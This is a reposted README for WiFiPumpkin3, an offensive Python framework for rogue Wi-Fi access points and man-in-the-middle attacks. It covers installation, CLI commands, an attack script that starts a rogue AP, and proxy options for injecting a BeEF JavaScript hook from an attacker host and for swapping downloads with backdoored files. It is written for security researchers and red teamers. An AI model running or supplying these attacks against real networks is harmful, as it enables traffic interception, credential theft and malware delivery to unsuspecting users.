WiFiPumpkin3 : Powerful Framework For Rogue Access Point Attack

WiFiPumpkin3 is powerful framework for rogue access point attack, written in Python, that allow and offer to security researchers, red teamers and reverse engineers to mount a wireless network to conduct a man-in-the-middle attack.

Main Features

• Rogue access point attack
• Man-in-the-middle attack
• Rogue Dns Server
• Captive portal attack (captiveflask)
• Intercept, inspect, modify and replay web traffic
• WiFi networks scanning
• DNS monitoring service
• Credentials harvesting
• Transparent Proxies
• LLMNR, NBT-NS and MDNS poisoner (Responder3)
• and more!

Supported Platforms

• Python: you need Python 3.7 or later to run Wp3.

NOTE: The Wp3 require hostapd installed by default

• Operating System:
  • A recent version of Linux (we tested on Ubuntu 18.04 LTS);
  • Please note: Windows is not supported.

Installation

The wifipumpkin3 written in Python 3 , you will need to have a working Python (version 3.7 or later) on your machine.

Note that

• Windows is not supported.
• Mac OS X is not supported. only docker version, but has been not tested.

Also Read – PowerSploit : A PowerShell Post-Exploitation Framework

Requirements

You will need to have a Wi-Fi adapter that supports Access-Point (AP) mode. The following list of OSs represents recommended environments to run wifipumpkin3 (wp3), as most of required dependencies are pre-installed. VMs or docker are also recommended.

Tools (pre-installed)

• iptables (current: iptables v1.6.1)
• iw (current: iw version 4.14)
• net-tools (current: version (1.60+)
• wireless-tools (current: version 30~pre9-12)
• hostapd (current: hostapd v2.6)

OS (recommended)

OS	Version
Ubuntu	18.04 LTS bionic
Docker	Ubuntu 18.04.4 LTS bionic

Based On Debian Procedure

wifipumpkin3 use the port 53 for mount python dns server, when i try to install on Ubuntu 18.04, i got somes error because this “port 53 is used by another process”. This problem is caused by systemd-resolved to solve only follow the step bellow.

• stop systemd-resolved “ sudo systemctl stop systemd-resolved”
• edit /etc/systemd/resolved.conf with these

• and execute this link file

sudo ln -sf /run/systemd/resolve/resolv.conf /etc/resolv.conf

Installation Procedure

if you’ve python 3.7 or later installed on your machine, it very simple to install the Wp3. Follow the steps:

Debian/Ubuntu

It is highly recommended install somes system packages, os-level dependencies.

sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3.7

$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo make install

or grab a Debian *.deb package from GitHub Releases

$ sudo dpkg -i wifipumpkin3-1.0.0-all.deb

Install on Kali Linux

the Kali Linux by default has installed python3.8 is compartible with wp3, I recommend to install somes system packages, os-level dependencies.

$ sudo apt install libssl-dev libffi-dev build-essential
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3

now, we need to install the PyQt5, it very easy:

sudo apt install python3-pyqt5

or check if the pyqt5 is installed successful:

python3 -c “from PyQt5.QtCore import QSettings; print(‘done’)”

now, if you got the message done, nice. the next step is install the wp3:

$ sudo python3 setup.py install

if you see this message bellow, everything ok !

Finished processing dependencies for wifipumpkin3==1.0.0

now, let’s execute the app:

$ sudo wifipumpkin3

all done, will be see the CLI of wp3.

Installation python virtualenv

Virtualenv is a tool used to create an isolated Python environment. Virtualenv is the easiest and recommended way to configure a custom Python environment.

version of PyQt5
for install change in file requirements.txt the version of Qt5, `PyQt5==5.14.0` to `PyQt5==5.14.2`. This version 5.14.2 work fine on virtualenv without error with python-sip depedencies.

$ sudo python3.7 -m pip install –upgrade pip
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo python3.7 -m pip install virtualenv

now, you need execute with superuser root:

# virtualenv -p python3.7 venv
# source venv/bin/activate
# make install_env

if you see this message bellow, everything ok !

Finished processing dependencies for wifipumpkin3==1.0.0

now, let’s execute the app:

# wifipumpkin3

all done, will be see the CLI of wp3 on virtualenv activated.

When finished working in the virtual environment, you can deactivate it by running the following:

# deactivate

Installation on Docker Container

Docker is an open platform for developing, shipping, and running applications. Docker enables you to separate your applications from your infrastructure so you can deliver software quickly. the wp3 is full compatible to run on docker container. let’s go:

https://docs.docker.com/get-docker/

with docker.io installed and working fine, let’s take a look how to mount a container with wp3. how to install on ubuntu

$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo docker build -t “wifipumpkin3”

this commands above will download and build a new container for us called wifipumpkin3, You’ll see Docker step through each instruction in your Dockerfile, building up your image as it goes. If successful, the build process should end with a message:

Successfully tagged wifipumpkin3

Now you need to run your image as a container, start a container based on your new image:

$ sudo docker run –privileged -ti –rm –name wifipumpkin3 –net host “wifipumpkin3”

all done, will be see the CLI of wp3 on docker with mode docker activated. 😉

About wireless adapters

Your wireless adapter and your kernel driver must support AP mode. In order to check this, execute this shell command:

iw list

If there is ‘AP’ in the list of “Supported interface modes”, your card has support for the desired mode.

Another method:

• Find your kernel driver module in use by issuing the below command: lspci -k | grep -A 3 -i network (example module: ath9k) next, use the below command to find out your wifi capabilities (replace ath9k by your kernel driver): modinfo ath9k | grep depend If the above output includes “mac80211” then it means your wifi card will support the AP mode.

The adapter needs to have drivers for GNU/Linux.

• another website list devices supported here
• check kernel drive wireless.wiki

Usage

Interactive Session

Once started the tool with sudo wifipumpkin3 , you’ll be presented with an interactive session like the metasploit framework where you can enable or disable modules, plugin, proxy configure the ap and etc.

The interface CLI is very simple, basic commands you’ll need to perform operations such as setting a session like accesspoint (AP) information (bssid, channel, interface), start/stop accesspoint and monitor clients activitys joined on AP.

Pulps

Pulps makes reference to pulp taken from a pumpkin, which can be used for various mixtures. It is possible to script your interactive session using pulps files. Pulps (script files with a .pulp extension) are a powerful way to automate your attack, like metasploit’s .rc files, where each line of the file is a command that’ll be executed one for one.

let’s take a look, how to create a script for set the interface, enable to start without proxy,set ssid the network, set work without log for dns and start the access point.

# configure the interface
set interface wlan1
# set name of access point will be created
set ssid demo
# set noproxy plguin
set proxy noproxy
# ignore all log from pydns_server
ignore pydns_server
# start the Access Point
start

Once saved as demo.pulp file, you’ll be able to load and execute it via:

sudo wifipumpkin3 –pulp /path/to/demo.pulp

if you not want to use .pulp file, exist a options to use the paraments –xpulp or -x and each command can either be executed singularly, or concatenated by the ; in string. for example:

sudo wifipumpkin3 –xpulp “set interface wlan1; set ssid demo; set proxy noproxy; start”

Arguments Commands

The basic command line arguments ( wifipumpkin3 -h ) are:

-i INTERFACE

Network interface to bind to, if empty the default interface is old session started.

-s SESSION

Session for continue attack, if you pass the old session id, all log will be added on same session.

–pulp PULP

Interactive sessions can be scripted with .pulp file,a powerful way to automate your attack.

–xpulp XPULP

each command can either be executed singularly, or concatenated by the ; in string.

–wireless-mode WIRELESS_MODE

Use this options for set the wireless mode (static, docker), by default is static mode, but you can change if you want to run on docker container.

–no-colors

disable terminal colors and effects.

-v, –version

show program’s version number and exit.

Core Commands

• help
  • Will list all available commands available
• clients
  • show all clients connected on Access Point with advanced UI
• ap
  • show all variable and status for settings AP. You can see (bssid, ssid, channel, security, or status ap)
• set
  • set variable proxy,plugin and access point, this command set is like metasploit set command.
• start
  • start access point (AP), if not something wrong the will be see a new AP with hostapd program. also the proxy,plugin should be initialized.
• stop
  • stop access point, process, thread, plugin and proxy’s that is running in background.
• ignore
  • the message logger will be ignored, the parameters can be ( captiveflask, pumpkinproxy, pydns_server sniffkin3 ). if you type this command not be see anymore log in console WP.
• restore
  • the message logger will be restored, as you can see above this command is inverse of ignore with same parameters will be restore the console log.
• info
  • get info from the proxy/plugin, this command show some informations of proxy/plugin like (log path, config path, description )
• jobs
  • show all threads/processes in background. Sometimes you need to find the process id or thread name of process created by WP.
• mode
  • show all wireless mode available.
• plugins
  • show all plugins available and their status.
• proxys
  • show all proxy available and their status.
• show
  • show available modules.
• search
  • search modules by name, this will be implemented in the future when million OD modules :sunglasses: is available
• use
  • select module for modules, full inspiration in metasploit modules.

Examples

Plugins

The plugins are designed to add features to WP3 core and run parallel with access point (AP), WP3 provides facilities to develop plugins. Generally speaking, there is really a few things you have to do in order to get a plugin working.

Info

The most important is you can run multi plugins simultaneously, because the plugins has been designed to work only monitor and analyse the traffic generate by users connected on access point.

The basic command guidelines to get a plugins are:

if you want to enable or disable the plugin, follow command bellow.

wp3 > set plugin plugin_name true/false

if the plugin has subplugins, when type plugins you see somes options for set. you can to enable/disable subplugins with command, type tab to autocomplete ;):

wp3 > set plugin_name.subplugins_name true/false

Plugin developers and users are welcome to include your plugin into this project, take a look the guidelines how to create a plugin.

Proxys

The Proxys are designed to add features to WP3 core and run parallel with access point (AP), but redirect all traffic with iptables. Proxies work by intercepting a request, modifying the request if necessary, then handling or forwarding the request to its destination. When a user connects to a AP, the transparent proxy intercepts the request before passing it on to the provider.

Info

The most important is you can run one proxies each time , because the proxies has been designed to work for manipulate data packets redirecting all data for a specific port number

Available Porxy’s:

• pumpkinproxy – Proxy for intercept network traffic on TCP protocol doc
• captiveflask – Allow block Internet access for users until they open the page login page. doc
• noproxy – Running without proxy redirect traffic

The basic command guidelines to get a plugins are:

if you want to select the proxy, follow command bellow.

wp3 > set proxy proxy_name

if the proxy has plugins, when type proxys you see somes options for set. you can to enable/disable plugin command, type tab to autocomplete ;):

wp3 > set proxy_name.plugin_name true/false

The example above is for enable/disable a plugin, but you can use same syntax to configure plugin parameter. you can see this parameter typing info proxy_name or using type like this example bellow, using tab to autocomplete.

wp3 > set pumpkinproxy. pumpkinproxy.beef pumpkinproxy.html_inject pumpkinproxy.beef.url_hook pumpkinproxy.html_inject.content_path pumpkinproxy.downloadspoof pumpkinproxy.js_inject pumpkinproxy.downloadspoof.backdoorExePath pumpkinproxy.js_inject.url pumpkinproxy.downloadspoof.backdoorPDFpath pumpkinproxy.no-cache pumpkinproxy.downloadspoof.backdoorWORDpath pumpkinproxy.replaceImages pumpkinproxy.downloadspoof.backdoorXLSpath pumpkinproxy.replaceImages.path wp3 > set pumpkinproxy.

let now set url_hook parameter the plugin beef to inject javascript in all request http.

wp3 > set pumpkinproxy.beef.url_hook http://172.16.149.141:3000/hook.js

Proxys developers and users are welcome to include your proxy into this project, take a look the guidelines how to create a proxy.

Modules

A module provides a features that not is necessary to use with access point, the must modules are projected for add a new functionality into attack, like devices discovery, services enumeration, perform deauthentication attacks and etc. Modules are introduced to add more functionalities to complement the attack.

Info

the syntax of modules basically follow the struct the modules of `metasploit`

The basic core command guidelines:

Commands	Descriptions
set	set options for module
back	go back one level
help	show avaliable commands
options	show options of current module
run	execute module

Modules developers and users are welcome to include your module into this project, take a look the guidelines how to create a module.